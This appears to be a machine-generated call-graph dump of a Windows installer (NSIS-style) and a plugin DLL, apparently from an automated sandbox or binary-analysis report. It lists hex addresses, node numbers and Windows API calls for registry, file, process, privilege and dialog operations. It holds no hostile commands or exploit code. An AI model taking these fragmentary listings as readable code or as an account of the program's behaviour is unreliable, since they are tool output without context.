5424 7014152e GlobalFree 5423->5424 5424->5416 5425 401956 5426 402c41 17 API calls 5425->5426 5427 40195d lstrlenW 5426->5427 5428 402592 5427->5428 5429 406ed6 5433 406976 5429->5433 5430 4072e1 5431 406a00 GlobalAlloc 5431->5430 5431->5433 5432 4069f7 GlobalFree 5432->5431 5433->5430 5433->5431 5433->5432 5433->5433 5434 406a77 GlobalAlloc 5433->5434 5435 406a6e GlobalFree 5433->5435 5434->5430 5434->5433 5435->5434 5436 4014d7 5437 402c1f 17 API calls 5436->5437 5438 4014dd Sleep 5437->5438 5440 402ac5 5438->5440 5441 401f58 5442 402c41 17 API calls 5441->5442 5443 401f5f 5442->5443 5444 40672b 2 API calls 5443->5444 5445 401f65 5444->5445 5447 401f76 5445->5447 5448 40632f wsprintfW 5445->5448 5448->5447 5449 402259 5450 402c41 17 API calls 5449->5450 5451 40225f 5450->5451 5452 402c41 17 API calls 5451->5452 5453 402268 5452->5453 5454 402c41 17 API calls 5453->5454 5455 402271 5454->5455 5456 40672b 2 API calls 5455->5456 5457 40227a 5456->5457 5458 40228b lstrlenW lstrlenW 5457->5458 5462 40227e 5457->5462 5459 405450 24 API calls 5458->5459 5461 4022c9 SHFileOperationW 5459->5461 5460 405450 24 API calls 5463 402286 5460->5463 5461->5462 5461->5463 5462->5460 5305 40175c 5306 402c41 17 API calls 5305->5306 5307 401763 5306->5307 5308 405f0d 2 API calls 5307->5308 5309 40176a 5308->5309 5310 405f0d 2 API calls 5309->5310 5310->5309 5464 401d5d GetDlgItem GetClientRect 5465 402c41 17 API calls 5464->5465 5466 401d8f LoadImageW SendMessageW 5465->5466 5467 402ac5 5466->5467 5468 401dad DeleteObject 5466->5468 5468->5467 5469 4022dd 5470 4022f7 5469->5470 5471 4022e4 5469->5471 5472 40640a 17 API calls 5471->5472 5473 4022f1 5472->5473 5474 405a4e MessageBoxIndirectW 5473->5474 5474->5470 5475 401563 5476 402a6b 5475->5476 5479 40632f wsprintfW 5476->5479 5478 402a70 5479->5478 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 40288b 4446 402c41 17 API calls 4449 40242e lstrlenW 4446->4449 4447 402438 4448 402444 4447->4448 4459 402c1f 4447->4459 4451 402463 RegSetValueExW 4448->4451 4462 4031d6 4448->4462 4449->4447 4453 402479 RegCloseKey 4451->4453 4453->4445 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4448 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 40329e 4467->4451 4468 405f61 ReadFile 4469 403221 4468->4469 4469->4467 4470 4032de 42 API calls 4469->4470 4471 403238 4470->4471 4471->4467 4472 4032a4 ReadFile 4471->4472 4474 403247 4471->4474 4472->4467 4474->4467 4475 405f61 ReadFile 4474->4475 4476 405f90 WriteFile 4474->4476 4475->4474 4476->4474 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4445 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4468 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406970 4498->4499 4502 406968 4498->4502 4500 406a00 GlobalAlloc 4499->4500 4501 4069f7 GlobalFree 4499->4501 4499->4502 4503 406a77 GlobalAlloc 4499->4503 4504 406a6e GlobalFree 4499->4504 4500->4499 4500->4502 4501->4500 4502->4492 4503->4499 4503->4502 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5487 402868 5488 402c41 17 API calls 5487->5488 5489 40286f FindFirstFileW 5488->5489 5490 402897 5489->5490 5493 402882 5489->5493 5495 40632f wsprintfW 5490->5495 5492 4028a0 5496 4063e8 lstrcpynW 5492->5496 5495->5492 5496->5493 5497 401968 5498 402c1f 17 API calls 5497->5498 5499 40196f 5498->5499 5500 402c1f 17 API calls 5499->5500 5501 40197c 5500->5501 5502 402c41 17 API calls 5501->5502 5503 401993 lstrlenW 5502->5503 5505 4019a4 5503->5505 5504 4019e5 5505->5504 5509 4063e8 lstrcpynW 5505->5509 5507 4019d5 5507->5504 5508 4019da lstrlenW 5507->5508 5508->5504 5509->5507 5510 7014103d 5511 7014101b 5 API calls 5510->5511 5512 70141056 5511->5512 5513 40166a 5514 402c41 17 API calls 5513->5514 5515 401670 5514->5515 5516 40672b 2 API calls 5515->5516 5517 401676 5516->5517 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5048 4017bb 5026->5048 5027 40672b 2 API calls 5027->5048 5028 4017f7 5029 405eb9 2 API calls 5028->5029 5029->5048 5031 4017cd CompareFileTime 5031->5048 5032 40188d 5034 405450 24 API calls 5032->5034 5033 401864 5035 405450 24 API calls 5033->5035 5053 401879 5033->5053 5036 401897 5034->5036 5035->5053 5037 4031d6 44 API calls 5036->5037 5038 4018aa 5037->5038 5039 4018be SetFileTime 5038->5039 5041 4018d0 CloseHandle 5038->5041 5039->5041 5040 40640a 17 API calls 5040->5048 5042 4018e1 5041->5042 5041->5053 5043 4018e6 5042->5043 5044 4018f9 5042->5044 5046 40640a 17 API calls 5043->5046 5047 40640a 17 API calls 5044->5047 5045 4063e8 lstrcpynW 5045->5048 5049 4018ee lstrcatW 5046->5049 5050 401901 5047->5050 5048->5027 5048->5028 5048->5031 5048->5032 5048->5033 5048->5040 5048->5045 5051 405a4e MessageBoxIndirectW 5048->5051 5054 405ede GetFileAttributesW CreateFileW 5048->5054 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5048 5052->5053 5054->5048 5055->5022 5056->5023 5057 4027ef 5058 402a70 5057->5058 5059 4027f6 5057->5059 5060 402c1f 17 API calls 5059->5060 5061 4027fd 5060->5061 5062 40280c SetFilePointer 5061->5062 5062->5058 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5058 5518 401a72 5519 402c1f 17 API calls 5518->5519 5520 401a7b 5519->5520 5521 402c1f 17 API calls 5520->5521 5522 401a20 5521->5522 5523 406af2 5524 406976 5523->5524 5525 4072e1 5524->5525 5526 406a00 GlobalAlloc 5524->5526 5527 4069f7 GlobalFree 5524->5527 5528 406a77 GlobalAlloc 5524->5528 5529 406a6e GlobalFree 5524->5529 5526->5524 5526->5525 5527->5526 5528->5524 5528->5525 5529->5528 5530 401573 5531 401583 ShowWindow 5530->5531 5532 40158c 5530->5532 5531->5532 5533 402ac5 5532->5533 5534 40159a ShowWindow 5532->5534 5534->5533 5535 401cf3 5536 402c1f 17 API calls 5535->5536 5537 401cf9 IsWindow 5536->5537 5538 401a20 5537->5538 5539 402df3 5540 402e05 SetTimer 5539->5540 5541 402e1e 5539->5541 5540->5541 5542 402e6c 5541->5542 5543 402e72 MulDiv 5541->5543 5544 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5543->5544 5544->5542 5546 4014f5 SetForegroundWindow 5547 402ac5 5546->5547 5548 402576 5549 402c41 17 API calls 5548->5549 5550 40257d 5549->5550 5553 405ede GetFileAttributesW CreateFileW 5550->5553 5552 402589 5553->5552 5257 401b77 5258 401b84 5257->5258 5259 401bc8 5257->5259 5260 401c0d 5258->5260 5266 401b9b 5258->5266 5261 401bf2 GlobalAlloc 5259->5261 5262 401bcd 5259->5262 5263 40640a 17 API calls 5260->5263 5270 4022f7 5260->5270 5264 40640a 17 API calls 5261->5264 5262->5270 5278 4063e8 lstrcpynW 5262->5278 5265 4022f1 5263->5265 5264->5260 5271 405a4e MessageBoxIndirectW 5265->5271 5276 4063e8 lstrcpynW 5266->5276 5269 401bdf GlobalFree 5269->5270 5271->5270 5272 401baa 5277 4063e8 lstrcpynW 5272->5277 5274 401bb9 5279 4063e8 lstrcpynW 5274->5279 5276->5272 5277->5274 5278->5269 5279->5270 5280 4024f8 5281 402c81 17 API calls 5280->5281 5282 402502 5281->5282 5283 402c1f 17 API calls 5282->5283 5284 40250b 5283->5284 5285 402533 RegEnumValueW 5284->5285 5286 402527 RegEnumKeyW 5284->5286 5287 40288b 5284->5287 5288 40254f RegCloseKey 5285->5288 5289 402548 5285->5289 5286->5288 5288->5287 5289->5288 5291 40167b 5292 402c41 17 API calls 5291->5292 5293 401682 5292->5293 5294 402c41 17 API calls 5293->5294 5295 40168b 5294->5295 5296 402c41 17 API calls 5295->5296 5297 401694 MoveFileW 5296->5297 5298 4016a0 5297->5298 5299 4016a7 5297->5299 5300 401423 24 API calls 5298->5300 5301 40672b 2 API calls 5299->5301 5303 402250 5299->5303 5300->5303 5302 4016b6 5301->5302 5302->5303 5304 4061ae 36 API calls 5302->5304 5304->5298 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5574 40288b 5573->5574 5579 406873 WaitForSingleObject 5573->5579 5576 401f01 CloseHandle 5576->5574 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5576 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 701416d4 5604 70141703 5603->5604 5605 70141b5f 22 API calls 5604->5605 5606 7014170a 5605->5606 5607 70141711 5606->5607 5608 7014171d 5606->5608 5609 70141272 2 API calls 5607->5609 5610 70141744 5608->5610 5611 70141727 5608->5611 5615 7014171b 5609->5615 5613 7014176e 5610->5613 5614 7014174a 5610->5614 5612 7014153d 3 API calls 5611->5612 5617 7014172c 5612->5617 5616 7014153d 3 API calls 5613->5616 5618 701415b4 3 API calls 5614->5618 5616->5615 5619 701415b4 3 API calls 5617->5619 5620 7014174f 5618->5620 5621 70141732 5619->5621 5622 70141272 2 API calls 5620->5622 5624 70141272 2 API calls 5621->5624 5623 70141755 GlobalFree 5622->5623 5623->5615 5625 70141769 GlobalFree 5623->5625 5626 70141738 GlobalFree 5624->5626 5625->5615 5626->5615 5627 70142c57 5628 70142c6f 5627->5628 5629 7014158f 2 API calls 5628->5629 5630 70142c8a 5629->5630 5631 401503 5632 40150b 5631->5632 5634 40151e 5631->5634 5633 402c1f 17 API calls 5632->5633 5633->5634 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4535 40288b 4531->4535 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4535 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5635 402104 5636 402c41 17 API calls 5635->5636 5637 40210b 5636->5637 5638 402c41 17 API calls 5637->5638 5639 402115 5638->5639 5640 402c41 17 API calls 5639->5640 5641 40211f 5640->5641 5642 402c41 17 API calls 5641->5642 5643 402129 5642->5643 5644 402c41 17 API calls 5643->5644 5646 402133 5644->5646 5645 402172 CoCreateInstance 5650 402191 5645->5650 5646->5645 5647 402c41 17 API calls 5646->5647 5647->5645 5648 401423 24 API calls 5649 402250 5648->5649 5650->5648 5650->5649 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4791 40402a 4788->4791 4792 403fea GetDlgItem GetDlgItem 4788->4792 4789->4788 4790 403eaa 4789->4790 4793 403eb5 SetWindowPos 4790->4793 4794 403ec8 4790->4794 4796 404084 4791->4796 4805 401389 2 API calls 4791->4805 4795 40435f 18 API calls 4792->4795 4793->4794 4798 403ee5 4794->4798 4799 403ecd ShowWindow 4794->4799 4800 404014 SetClassLongW 4795->4800 4797 4043ab SendMessageW 4796->4797 4801 403fd4 4796->4801 4828 404096 4797->4828 4802 403f07 4798->4802 4803 403eed DestroyWindow 4798->4803 4799->4798 4804 40140b 2 API calls 4800->4804 4807 403f0c SetWindowLongW 4802->4807 4808 403f1d 4802->4808 4806 404309 4803->4806 4804->4791 4809 40405c 4805->4809 4806->4801 4816 404319 ShowWindow 4806->4816 4807->4801 4813 403fc6 4808->4813 4814 403f29 GetDlgItem 4808->4814 4809->4796 4810 404060 SendMessageW 4809->4810 4810->4801 4811 40140b 2 API calls 4811->4828 4812 4042ea DestroyWindow EndDialog 4812->4806 4868 4043c6 4813->4868 4817 403f59 4814->4817 4818 403f3c SendMessageW IsWindowEnabled 4814->4818 4816->4801 4820 403f66 4817->4820 4821 403fad SendMessageW 4817->4821 4822 403f79 4817->4822 4831 403f5e 4817->4831 4818->4801 4818->4817 4819 40640a 17 API calls 4819->4828 4820->4821 4820->4831 4821->4813 4825 403f81 4822->4825 4826 403f96 4822->4826 4824 40435f 18 API calls 4824->4828 4829 40140b 2 API calls 4825->4829 4830 40140b 2 API calls 4826->4830 4827 403f94 4827->4813 4828->4801 4828->4811 4828->4812 4828->4819 4828->4824 4849 40422a DestroyWindow 4828->4849 4859 40435f 4828->4859 4829->4831 4832 403f9d 4830->4832 4865 404338 4831->4865 4832->4813 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4828 4849->4806 4850 404244 CreateDialogParamW 4849->4850 4850->4806 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4801 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4806 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4827 4867->4866 4869 4043de GetWindowLongW 4868->4869 4870 404489 4868->4870 4869->4870 4871 4043f3 4869->4871 4870->4801 4871->4870 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4870 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4870 5651 401f06 5652 402c41 17 API calls 5651->5652 5653 401f0c 5652->5653 5654 405450 24 API calls 5653->5654 5655 401f16 5654->5655 5656 4059d1 2 API calls 5655->5656 5657 401f1c 5656->5657 5658 401f3f CloseHandle 5657->5658 5659 406873 5 API calls 5657->5659 5661 40288b 5657->5661 5658->5661 5662 401f31 5659->5662 5662->5658 5664 40632f wsprintfW 5662->5664 5664->5658 5665 404809 5666 404819 5665->5666 5667 40483f 5665->5667 5668 40435f 18 API calls 5666->5668 5669 4043c6 8 API calls 5667->5669 5670 404826 SetDlgItemTextW 5668->5670 5671 40484b 5669->5671 5670->5667 5672 70141058 5674 70141074 5672->5674 5673 701410dd 5674->5673 5675 70141516 GlobalFree 5674->5675 5676 70141092 5674->5676 5675->5676 5677 70141516 GlobalFree 5676->5677 5678 701410a2 5677->5678 5679 701410b2 5678->5679 5680 701410a9 GlobalSize 5678->5680 5681 701410b6 GlobalAlloc 5679->5681 5682 701410c7 5679->5682 5680->5679 5683 7014153d 3 API calls 5681->5683 5684 701410d2 GlobalFree 5682->5684 5683->5682 5684->5673 5685 40190c 5686 401943 5685->5686 5687 402c41 17 API calls 5686->5687 5688 401948 5687->5688 5689 405afa 67 API calls 5688->5689 5690 401951 5689->5690 5691 40230c 5692 402314 5691->5692 5693 40231a 5691->5693 5694 402c41 17 API calls 5692->5694 5695 402328 5693->5695 5696 402c41 17 API calls 5693->5696 5694->5693 5698 402c41 17 API calls 5695->5698 5700 402336 5695->5700 5696->5695 5697 402c41 17 API calls 5699 40233f WritePrivateProfileStringW 5697->5699 5698->5700 5700->5697 5701 401f8c 5702 402c41 17 API calls 5701->5702 5703 401f93 5702->5703 5704 4067c2 5 API calls 5703->5704 5705 401fa2 5704->5705 5706 402026 5705->5706 5707 401fbe GlobalAlloc 5705->5707 5707->5706 5708 401fd2 5707->5708 5709 4067c2 5 API calls 5708->5709 5710 401fd9 5709->5710 5711 4067c2 5 API calls 5710->5711 5712 401fe3 5711->5712 5712->5706 5716 40632f wsprintfW 5712->5716 5714 402018 5717 40632f wsprintfW 5714->5717 5716->5714 5717->5706 5718 701418d9 5719 701418fc 5718->5719 5720 70141931 GlobalFree 5719->5720 5721 70141943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5719->5721 5720->5721 5722 70141272 2 API calls 5721->5722 5723 70141ace GlobalFree GlobalFree 5722->5723 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4989 402c41 17 API calls 4987->4989 4990 402c81 17 API calls 4988->4990 4991 4023c8 4989->4991 4992 40239d 4990->4992 4998 402cff 4991->4998 4994 4023a7 4992->4994 4997 4023d5 4992->4997 4995 402c41 17 API calls 4994->4995 4996 4023ae RegDeleteValueW RegCloseKey 4995->4996 4996->4997 4999 402d13 4998->4999 5000 402d0c 4998->5000 4999->5000 5002 402d44 4999->5002 5000->4997 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402dec 5004->5005 5012 402d76 5004->5012 5005->5000 5006 402d98 RegEnumKeyW 5007 402daf RegCloseKey 5006->5007 5006->5012 5008 4067c2 5 API calls 5007->5008 5011 402dbf 5008->5011 5009 402dd0 RegCloseKey 5009->5005 5010 402d44 6 API calls 5010->5012 5013 402de0 RegDeleteKeyW 5011->5013 5014 402dc3 5011->5014 5012->5006 5012->5007 5012->5009 5012->5010 5013->5005 5014->5005 5724 40190f 5725 402c41 17 API calls 5724->5725 5726 401916 5725->5726 5727 405a4e MessageBoxIndirectW 5726->5727 5728 40191f 5727->5728 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5734 40576a 5731->5734 5733->5734 5736 405795 5734->5736 5737 405781 ShowWindow ShowWindow 5734->5737 5738 4057ba 5734->5738 5735 405620 5743 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5735->5743 5740 4057a9 5736->5740 5741 4057cf ShowWindow 5736->5741 5744 4057f5 5736->5744 5776 404394 SendMessageW 5737->5776 5742 4043c6 8 API calls 5738->5742 5745 404338 SendMessageW 5740->5745 5747 4057e1 5741->5747 5748 4057ef 5741->5748 5746 4057c8 5742->5746 5749 405695 5743->5749 5750 405679 SendMessageW SendMessageW 5743->5750 5744->5738 5751 405803 SendMessageW 5744->5751 5745->5738 5755 405450 24 API calls 5747->5755 5756 404338 SendMessageW 5748->5756 5752 4056a8 5749->5752 5753 40569a SendMessageW 5749->5753 5750->5749 5751->5746 5754 40581c CreatePopupMenu 5751->5754 5758 40435f 18 API calls 5752->5758 5753->5752 5757 40640a 17 API calls 5754->5757 5755->5748 5756->5744 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5746 5765 405877 5762->5765 5766 4056e4 5763->5766 5767 4056d7 ShowWindow 5763->5767 5764->5746 5768 40571c SendMessageW SendMessageW 5764->5768 5769 405893 SendMessageW 5765->5769 5775 404394 SendMessageW 5766->5775 5767->5766 5768->5746 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5746 5774->5735 5775->5764 5776->5736 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5820 404650 5813->5820 5821 40435f 18 API calls 5814->5821 5815 4046ba 5816 404784 5815->5816 5817 4046c4 GetDlgItem 5815->5817 5822 4043c6 8 API calls 5816->5822 5818 404745 5817->5818 5819 4046de 5817->5819 5818->5816 5826 404757 5818->5826 5819->5818 5825 404704 SendMessageW LoadCursorW SetCursor 5819->5825 5820->5815 5820->5816 5823 40468b GetDlgItem SendMessageW 5820->5823 5824 40459d 5821->5824 5837 40477f 5822->5837 5846 404381 EnableWindow 5823->5846 5828 40435f 18 API calls 5824->5828 5847 4047cd 5825->5847 5831 40476d 5826->5831 5832 40475d SendMessageW 5826->5832 5829 4045aa CheckDlgButton 5828->5829 5844 404381 EnableWindow 5829->5844 5836 404773 SendMessageW 5831->5836 5831->5837 5832->5831 5833 4046b5 5838 4047a9 SendMessageW 5833->5838 5836->5837 5838->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5837 5843->5842 5844->5839 5845->5841 5846->5833 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5818 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4571 4035c6 4563->4571 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4572 403474 12 API calls 4567->4572 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4569 405cea CharNextW 4569->4571 4571->4569 4576 4036c2 4571->4576 4578 4036c0 4571->4578 4574 40370f 4572->4574 4573 40375d 4579 403800 4573->4579 4583 405cea CharNextW 4573->4583 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4577 403474 12 API calls 4575->4577 4732 4063e8 lstrcpynW 4576->4732 4581 403741 4577->4581 4578->4564 4676 403ad8 4579->4676 4581->4568 4581->4629 4600 40377c 4583->4600 4586 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4586->4588 4589 4039ce ExitProcess 4586->4589 4587 40382a 4744 405a4e 4587->4744 4594 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4594 4595 40399e 4588->4595 4591 403840 4598 4059b9 5 API calls 4591->4598 4592 4037da 4597 405dc5 18 API calls 4592->4597 4594->4595 4599 4067c2 5 API calls 4595->4599 4601 4037e6 4597->4601 4602 403845 lstrcatW 4598->4602 4603 4039a5 4599->4603 4600->4591 4600->4592 4601->4629 4733 4063e8 lstrcpynW 4601->4733 4604 403861 lstrcatW lstrcmpiW 4602->4604 4605 403856 lstrcatW 4602->4605 4606 4039ba ExitWindowsEx 4603->4606 4609 4039c7 4603->4609 4608 40387d 4604->4608 4604->4629 4605->4604 4606->4589 4606->4609 4611 403882 4608->4611 4612 403889 4608->4612 4613 40140b 2 API calls 4609->4613 4610 4037f5 4734 4063e8 lstrcpynW 4610->4734 4615 40591f 4 API calls 4611->4615 4616 40599c 2 API calls 4612->4616 4613->4589 4617 403887 4615->4617 4618 40388e SetCurrentDirectoryW 4616->4618 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4627 4061ae 36 API calls 4626->4627 4627->4629 4628 4061ae 36 API calls 4628->4631 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4628 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4639 403480 4637->4639 4638 40348a 4638->4566 4639->4638 4640 405cbd 3 API calls 4639->4640 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede 